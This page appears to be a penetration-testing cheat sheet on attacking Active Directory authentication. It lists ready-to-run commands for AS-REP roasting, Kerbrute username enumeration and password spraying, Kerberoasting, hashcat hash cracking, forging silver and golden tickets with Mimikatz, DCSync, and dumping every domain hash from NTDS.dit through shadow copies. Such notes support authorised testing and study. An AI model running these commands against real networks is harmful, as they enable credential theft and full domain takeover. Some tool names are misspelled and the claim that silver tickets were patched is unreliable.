Active Directory Authentication

AS-REP roasting (get TGT / password if lucky)

Gets you TGT, Combo with Kerbrute, also sending AS-REQ is the first step of authentication via Kerberos.

Kerberoasting typically requires credentials to run the attack. There is an option for an account to have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true.

Check it flag is set to true:

Get-DomainUser -PreauthNotRequired

You can get the usernames for example with enumeration users through RPC.

Windows alternative: Rubeus

Without password:

impacket-GetNPUsers -no-pass -dc-ip <DC_IP> <domain/user>

With password:

impacket-GetNPUsers -dc-ip <IP>  -request -outputfile hashes.asreproast <DOMAIN>/<USER>

After that attack you can crack the hash using hashcat.

Identifier can differ - visit example_hashes: https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

Kerbrute (User enumeration & Password spray)

You can brute force users from Kerberos in order to get usernames. Remember to try searching for usernames on other ports.

In order to get the passwords you can use AS-AEP roasting or use usernames as passwords.

Tool link: https://github.com/ropnop/kerbrute

kerbrute userenum -d <domain> ~/SecLists/Usernames/xato-net-10-million-usernames.txt --dc <DC_IP>

Password spraying:

If you receive a network error, make sure that the encoding of password with usernames is ANSI.

.\kerbrute_windows_amd64.exe passwordspray -d <DOMAIN> <USERNAMES_FILE> "<PASSWORD>"

Kerberoasting

If you will get KRB_AP_ERR_SKEW error -> synchronize Kali's time to the machine.

This is how this work. We are trying to get TGS with server's account hash in order to crack it and gain control over domain controller.

Kerberoasting

Once you have admin/standard user access, look for the supported SPNs and get TGS ticket for the SPN using GetUserSPNs tool from Impacket.

Copy

impacket-GetUserSPN -request -dc-ip <DC_IP> <DOMAIN>/<USER>

Now once you have the TGS hash, all we need to do is to feed the hash to Hashcat tool to fetch Server’s user.

Copy

Hashcat -m 13100 <hash_file> <rockyou wordlist>

Silver ticket

Patched by Microsoft in October 2022.

We can forge our own tickets to access the resource with any permissions we desire (If users hash is used to create service tickets for it).

In order to create silver ticket we need:

SPN password hash (NTLM)

Mimikatz way (if the service is on the same machine):

privilege::debug
sekurlsa::logonpasswords

Domain SID

whoami /user

Get Domain SID without the last part:

S-1-5-21-1987371270-658605905-1781884369-1102

Target SPN

URL in case of web application.

Command:

kerberos::golden /sid:<DOMAIN_SID> /domain:corp.com /ptt /target:<URL> /service:<SERVICE_TYPE> /rc4:<NTLM> /user:<USER_SET_IN_FORGET_TICKET> # ptt injects the ticket in the memory of machine we execute it from

Check if the ticket is in memory:

klist

Example check of HTTP service:

iwr -UseDefaultCredentials http://<url>

Domain Controller Synchronization

Forge a rogue update request to a domain controller from a user with certein rights.

Required permission: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes in Filtered Set.

By default Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.

We can request for any user in the domain using:

Mimikatz

lsadump::dcsync /user:<DOMAIN>\<USER>

Secretsdump

impacket-secretsdump -just-dc-user <VICTIM_USER> <DOMAIN>/<USER>:"<PASSWORD>"@<DC_IP>

Golden Ticket

Access to all resources in the entire domain.

Kerberos uses hash of krbtgt account to encrypt TGT. If we takeover this account / hash we are able to create our own custom TGTs.

Dump hashes from LSA:

lsadump::lsa /patch

Delete existing kerberos tickets:

kerberos::purge

Get domain SID:

whoami /user

Get Domain SID without the last part:

S-1-5-21-1987371270-658605905-1781884369-1102

Create golden ticket:

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NTLM_HASH> /ptt

Run cmd:

misc::cmd

Shadow Copies

If we are domain admins we can extract NTDS.dit - AD database file.

Shadow copy is a microsoft backup technology. It uses vshadow.exe.

Create snapshot:

vshadow.exe -nw -p  C:

Once the snapshot has been taken successfully, we should take note of the shadow copy device name.

Copy AD database:

copy <SHADOW_COPY_DEVICE_NAME_PATH>\windows\ntds\ntds.dit c:\ntds.dit.bak

Extract database:

reg.exe save hklm\system c:\system.bak

Move these two files to a kali machine and perform secretsdump:

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

This results in getting every hash in AD.

PreviousAutomated Information GatheringNextLateral Movement

Last updated